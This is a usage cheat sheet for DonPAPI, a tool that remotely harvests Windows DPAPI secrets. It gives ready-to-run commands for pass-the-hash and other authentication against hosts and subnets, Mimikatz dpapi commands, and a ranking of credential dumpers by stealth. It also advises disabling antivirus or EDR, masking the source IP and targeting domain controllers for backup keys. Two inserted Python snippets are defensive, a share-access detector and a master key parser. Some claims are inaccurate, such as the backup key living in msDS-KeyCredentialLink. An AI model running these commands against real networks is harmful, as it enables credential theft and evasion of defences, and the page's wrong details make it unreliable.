DonPAPI

DonPAPI is a post-exploitation framework for remotely harvesting Windows credentials and secrets via DPAPI without touching LSASS. It extracts browser passwords, WiFi keys, vault credentials, and certificates from target machines over the network.

Installation

Install from PyPI:

pip install donpapi

Install from source:

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
pip install -r requirements.txt
python donpapi.py --help

Requires Python 3.8+, Impacket, and Windows domain credentials for remote access.

Quick Start

Basic usage with password authentication:

donpapi -d DOMAIN -u USERNAME -p PASSWORD 192.168.1.100

Single IP with domain admin account:

donpapi -d contoso.com -u admin -p 'P@ssw0rd!' 10.0.0.50

Against multiple targets:

donpapi -d domain.com -u user -p pass 10.0.0.0/24

Authentication Methods

Password Authentication

donpapi -d DOMAIN -u USERNAME -p PASSWORD TARGET
donpapi -d corp -u jdoe -p 'MyPassword123!' 192.168.1.100

NTLM Hash (Pass-the-Hash)

donpapi -d DOMAIN -u USERNAME -H NTHASH TARGET
donpapi -d corp -u admin -H 8846f7eaee8fb117ad06bdd830b7586c 10.0.0.50

Kerberos Authentication

donpapi -d DOMAIN -u USERNAME -k TARGET
export KRB5CCNAME=/tmp/user.ccache
donpapi -d corp -u jdoe -k 192.168.1.100

AES Key Authentication

donpapi -d DOMAIN -u USERNAME -aesKey AESKEY TARGET
donpapi -d corp -u user -aesKey abc123def456... 10.0.0.100

Current Session (LUID/Session Token)

donpapi -luid TOKEN TARGET
donpapi -luid 0x12345:0x6789abc 192.168.1.100

Target Specification

Single IP Address

donpapi -d domain.com -u admin -p pass 192.168.1.100

CIDR Range

donpapi -d domain.com -u admin -p pass 192.168.1.0/24
donpapi -d domain.com -u admin -p pass 10.0.0.0/16

Targets from File

donpapi -d domain.com -u admin -p pass -tf targets.txt

targets.txt format (one per line):

192.168.1.100
192.168.1.101
192.168.1.102
10.0.0.50

Target IP Override

donpapi -d domain.com -u admin -p pass --target-ip 192.168.1.100 hostname

What It Collects

Browser Credentials

Extracts cached passwords and stored credentials from:

# Chrome/Chromium passwords and saved autofill
# Microsoft Edge passwords and autofill
# Firefox passwords (if encrypted with DPAPI)
# Opera, Brave, and other Chromium-based browsers

Browser   Passwords  Cookies  Autofill  Bookmarks
Chrome    Yes        Yes      Yes       No
Edge      Yes        Yes      Yes       No
Firefox   Yes        No       No        No
Opera     Yes        Yes      Yes       No
Brave     Yes        Yes      Yes       No

WiFi Passwords

Recovers stored wireless network credentials:

# All SSID names and pre-shared keys (PSK)
# Connection profiles with DPAPI encryption
# Requires domain backup key for decryption

Windows Vault Credentials

Extracts stored credentials from Windows Credential Manager:

# Generic credentials (username/password pairs)
# Domain credentials
# Certificate-based credentials
# Session cookies

Certificate Data

Harvests certificate-related secrets:

# Private keys
# Client certificates
# Server certificates
# Certificate thumbprints

RDP Connection History

Retrieves Remote Desktop credentials:

# Saved RDP connection passwords
# Connection metadata
# Server information

Scheduled Task Credentials

Extracts credentials from scheduled tasks:

# Task-embedded usernames and passwords
# Run-as credentials
# Service account details

Collection Methods

Registry Access Over SMB

# HKEY_CURRENT_USER registry hives remotely
# HKEY_LOCAL_MACHINE sensitive locations
# No local execution required
# SAM/SECURITY/SYSTEM hives for hash extraction

Protected File Retrieval

# Copies protected files via SMB
# Browser database files
# Vault credential stores
# DPAPI protected files

Stealthy vs. Mimikatz

DonPAPI advantages over Mimikatz:

# No LSASS memory access required
# No code injection needed
# No process creation on target
# Remote execution only
# Does not trigger antivirus hooks on LSASS
# Secrets are recovered from on-disk artifacts, not memory
# Minimal memory footprint
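Because none of this touches LSASS, LSASS-access telemetry never fires; the signal that remains is the SMB admin-share traffic described under Collection Methods. The following Python is an added example, not DonPAPI's or this page's code: it groups Security event 5145 (network share object access) records by source address and account and flags reads of the DPAPI-related paths. The record fields (src, user, share, target) are a simplified assumption about how 5145 events have been parsed, and the sample records are constructed inline.

```python
import re
from collections import defaultdict

# Relative Target Name patterns (Security event 5145, network share object
# access) for the on-disk artifacts a remote DPAPI harvester copies over C$.
DPAPI_PATHS = {
    "user_masterkey": r"Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-",
    "machine_masterkey": r"Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\",
    "vault_blob": r"Users\\[^\\]+\\AppData\\(Roaming|Local)\\Microsoft\\(Credentials|Vault)\\",
    "browser_db": r"Users\\[^\\]+\\AppData\\Local\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\",
    "wifi_profile": r"ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces\\",
}
_RX = {name: re.compile(p, re.IGNORECASE) for name, p in DPAPI_PATHS.items()}
ADMIN_SHARES = {r"\\*\C$", r"\\*\ADMIN$"}

def classify(event: dict):
    """Return the artifact category a share-access event touches, or None."""
    if event["share"] not in ADMIN_SHARES:
        return None
    return next((n for n, rx in _RX.items() if rx.search(event["target"])), None)

def find_dpapi_harvesting(events, min_categories=2):
    """Group admin-share reads by (source IP, account) and flag pairs that read
    a master key or touch at least min_categories artifact kinds.
    Returns {(src, user): sorted category list}."""
    seen = defaultdict(set)
    for ev in events:
        cat = classify(ev)
        if cat:
            seen[(ev["src"], ev["user"])].add(cat)
    return {k: sorted(v) for k, v in seen.items()
            if v & {"user_masterkey", "machine_masterkey"} or len(v) >= min_categories}

# Constructed sample records with the 5145 fields the logic needs; not real telemetry.
SAMPLE_EVENTS = [
    {"src": "10.0.0.77", "user": r"CORP\svc-backup", "share": r"\\*\C$",
     "target": r"Users\jdoe\AppData\Roaming\Microsoft\Protect\S-1-5-21-1-2-3-1001\abcd"},
    {"src": "10.0.0.77", "user": r"CORP\svc-backup", "share": r"\\*\C$",
     "target": r"Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"src": "10.0.0.77", "user": r"CORP\svc-backup", "share": r"\\*\C$",
     "target": r"ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{guid}\{guid}.xml"},
    {"src": "10.0.0.12", "user": r"CORP\helpdesk", "share": r"\\*\C$",
     "target": r"Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"src": "10.0.0.12", "user": r"CORP\helpdesk", "share": r"\\*\Public",
     "target": r"docs\readme.txt"},
]

if __name__ == "__main__":
    for (src, user), cats in find_dpapi_harvesting(SAMPLE_EVENTS).items():
        print(f"ALERT {src} as {user}: {', '.join(cats)}")
```

A single Chrome database read from a helpdesk host stays below the threshold, while one account pulling a master key plus browser and WiFi artifacts from the same source is flagged.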

Output and Reporting

Specify Output Directory

donpapi -d domain.com -u admin -p pass -o /tmp/output 192.168.1.100

Output Structure

output/
├── 192.168.1.100/
│   ├── Browser Credentials/
│   │   ├── chrome_passwords.txt
│   │   ├── edge_passwords.txt
│   │   └── firefox_logins.json
│   ├── Wifi/
│   │   └── wifi_passwords.txt
│   ├── Windows Vault/
│   │   └── vault_credentials.txt
│   ├── Windows Certificates/
│   │   └── certificates.pem
│   ├── RDP/
│   │   └── rdp_credentials.txt
│   └── report.html

HTML Report

Automatically generated summary:

# Visual dashboard of recovered credentials
# Target overview and collection summary
# Credentials grouped by type
# Timeline of collection
# Export-ready formats

Database Export

# SQLite database with all findings
# Searchable credential repository
# Machine-readable format
# Integration with credential managers

Filtering Options

Exclude Browser Credentials

donpapi -d domain.com -u admin -p pass --no-browser 192.168.1.100

Exclude VNC Credentials

donpapi -d domain.com -u admin -p pass --no-vnc 192.168.1.100

Exclude WiFi Passwords

donpapi -d domain.com -u admin -p pass --no-wifi 192.168.1.100

Exclude Sysadmin Accounts

donpapi -d domain.com -u admin -p pass --no-sysadmins 192.168.1.100

Selective Collection

donpapi -d domain.com -u admin -p pass --filter browsers,wifi,vault 192.168.1.100
donpapi -d domain.com -u admin -p pass --filter certificates,rdp 192.168.1.100

Combined Filtering

donpapi -d domain.com -u admin -p pass --no-browser --no-vnc --filter vault,wifi 10.0.0.0/24

DPAPI Explained

Windows DPAPI Overview

DPAPI (Data Protection API) is Windows’ built-in encryption mechanism:

# User-level keys: encrypted with user password
# Machine-level keys: encrypted with SYSTEM
# Domain backup key: allows domain admin decryption
# Master keys stored in user's profile

DPAPI Master Keys

Location and structure:

# User keys: C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\{SID}
# System keys: C:\Windows\System32\Microsoft\Protect\S-1-5-18
# Multiple master keys per user (created periodically)
# Protected by user's logon password

Domain Backup Key Recovery

# Domain admins can extract domain backup key
# Allows decryption of all domain user DPAPI secrets
# Stored in AD (msDS-KeyCredentialLink, etc.)
# Enables offline credential recovery
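To make the master key layout and the domain backup key relationship above concrete, here is an added Python parser (not DonPAPI's or Impacket's code) that reads a master key file header and reports whether a DomainKey section is present, which is what makes the key recoverable with the domain backup key alone. Field offsets follow the public layout used by Impacket's dpapi.py; the sample file bytes are constructed inline and do not come from a real system.

```python
import struct

# Fixed-size master key file header, little-endian: version, 2 reserved
# dwords, 72-byte UTF-16LE GUID, 2 reserved dwords, policy, then the byte
# lengths of the MasterKey, BackupKey, CredHist and DomainKey sections.
_HDR = struct.Struct("<LLL72sLLLQQQQ")

def parse_masterkey_file(data: bytes) -> dict:
    """Parse a DPAPI master key file and summarise how it is protected.

    A non-empty DomainKey section means the master key was also sealed to
    the domain backup key, so it can be recovered without the user password.
    """
    if len(data) < _HDR.size:
        raise ValueError("too short for a master key file header")
    (version, _, _, guid_raw, _, _, policy,
     mk_len, bk_len, ch_len, dk_len) = _HDR.unpack_from(data, 0)
    if version != 2:
        raise ValueError(f"unsupported master key file version {version}")
    if _HDR.size + mk_len + bk_len + ch_len + dk_len > len(data) or mk_len < 32:
        raise ValueError("section lengths inconsistent with file size")
    mk = data[_HDR.size:_HDR.size + mk_len]
    # MasterKey section: version(4) salt(16) rounds(4) hash alg(4) crypt alg(4) ...
    rounds, hash_alg, crypt_alg = struct.unpack_from("<LLL", mk, 20)
    return {
        "guid": guid_raw.decode("utf-16-le").rstrip("\x00"),
        "policy": policy,
        "pbkdf2_rounds": rounds,
        "hash_alg": hash_alg,
        "crypt_alg": crypt_alg,
        "has_domain_backup": dk_len > 0,
        "has_credhist": ch_len > 0,
    }

def build_sample(with_domain_key: bool) -> bytes:
    """Constructed sample file (not from a real host) for exercising the parser."""
    guid = "11111111-2222-3333-4444-555555555555".encode("utf-16-le")
    # 8000 PBKDF2 rounds, CALG_SHA_512 (0x800e), CALG_AES_256 (0x6610), dummy ciphertext
    mk = struct.pack("<L16sLLL", 2, b"\x01" * 16, 8000, 0x800E, 0x6610) + b"\x00" * 64
    # DomainKey section: version, secret len, access-check len, backup key GUID
    dk = struct.pack("<LLL16s", 2, 0, 0, b"\x00" * 16) if with_domain_key else b""
    hdr = _HDR.pack(2, 0, 0, guid, 0, 0, 0, len(mk), 0, 0, len(dk))
    return hdr + mk + dk

if __name__ == "__main__":
    for flag in (True, False):
        print(parse_masterkey_file(build_sample(flag)))
```

Run over the Protect directory of a profile, the has_domain_backup flag tells a defender which users' secrets fall under a domain backup key compromise rather than only a password compromise.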

Advanced Options

Provide Domain Backup Key

donpapi -d domain.com -u admin -p pass --pvk domain_backup.pvk 192.168.1.100

Specify Domain Controller IP

donpapi -d domain.com -u admin -p pass --dc-ip 10.0.0.10 192.168.1.100

Custom Target IP

donpapi -d domain.com -u admin -p pass --target-ip 10.0.0.100 WORKSTATION01

Port Specification

donpapi -d domain.com -u admin -p pass -ports 445,3389 192.168.1.100
donpapi -d domain.com -u admin -p pass --port 445 192.168.1.0/24

Multithreaded Collection

donpapi -d domain.com -u admin -p pass --threads 10 192.168.1.0/24

Verbose Logging

donpapi -d domain.com -u admin -p pass -v 192.168.1.100
donpapi -d domain.com -u admin -p pass -vv 192.168.1.100

Troubleshooting

Connection Refused

Check network connectivity and firewall:

# Verify SMB port 445 is open
# Confirm credentials are valid
# Check firewall rules on target
# Ensure target is reachable

Access Denied

Verify authentication credentials:

# Confirm username and password
# Check user has administrative rights
# Verify domain name is correct
# Test with different credential type (hash vs. password)

No Credentials Found

Target may have limited secrets stored:

# User may not have browser passwords saved
# WiFi passwords only stored for currently connected network
# Check --no-* filters aren't excluding data
# Verify user has logged in and cached credentials

DPAPI Decryption Fails

Cannot decrypt without proper keys:

# Domain backup key not available
# User password not correct
# DPAPI masterkey file corrupted
# Try with domain admin account for better access

SMB Enumeration Timeout

Increase timeout for slow networks:

donpapi -d domain.com -u admin -p pass --timeout 30 192.168.1.100

Best Practices

Operational Security

# Use domain admin or compromised admin account
# Filter unnecessary data collections (--no-browser if not needed)
# Disable antivirus/EDR temporarily if possible
# Run against specific targets, not blind scans
# Clean up output files after collection
# Use VPN/proxy to mask source IP

Collection Strategy

# Target high-value systems first (servers, admin workstations)
# Prioritize domain controllers for backup key extraction
# Focus on service accounts with stored credentials
# Combine with credential validation tools
# Document all collected credentials safely

Credential Validation

After collection, validate credentials:

# Test RDP credentials against target
# Verify domain account access
# Check WiFi connectivity
# Authenticate to discovered systems
# Prioritize credentials by privilege level

Safe Storage

Protect harvested credentials:

# Store output directory on encrypted volume
# Restrict access to findings
# Use separate reporting machine
# Archive securely for cleanup
# Document chain of custody

Mimikatz DPAPI Modules

Extract DPAPI secrets with Mimikatz:

mimikatz.exe "dpapi::cred /in:C:\Users\user\AppData\Roaming\..."
mimikatz.exe "dpapi::masterkey /in:masterkey_file"
mimikatz.exe "dpapi::cache" # List cached DPAPI data

SharpDPAPI

C# DPAPI extraction tool:

# Windows-native DPAPI exploitation
# Chromium-based browser password extraction
# Vault credential recovery
# RDP connection harvesting

Impacket dpapi.py

Python DPAPI utilities:

# Masterkey file parsing
# DPAPI secret decryption
# Domain backup key operations
# Cryptographic key extraction

LaZagne

Multi-platform credential recovery:

# Browser password extraction
# VPN credential harvesting
# Mail client password recovery
# SSH key enumeration

Other Credential Tools

Tool                 Purpose                         Stealth
Mimikatz             In-memory credential dumping    Low
procdump + pypykatz  Indirect LSASS dumping          Medium
Nirsoft tools        Cached credential recovery      Medium
SafetyKatz           Obfuscated Mimikatz variant     Medium
Credentials.ps1      PowerShell credential module    High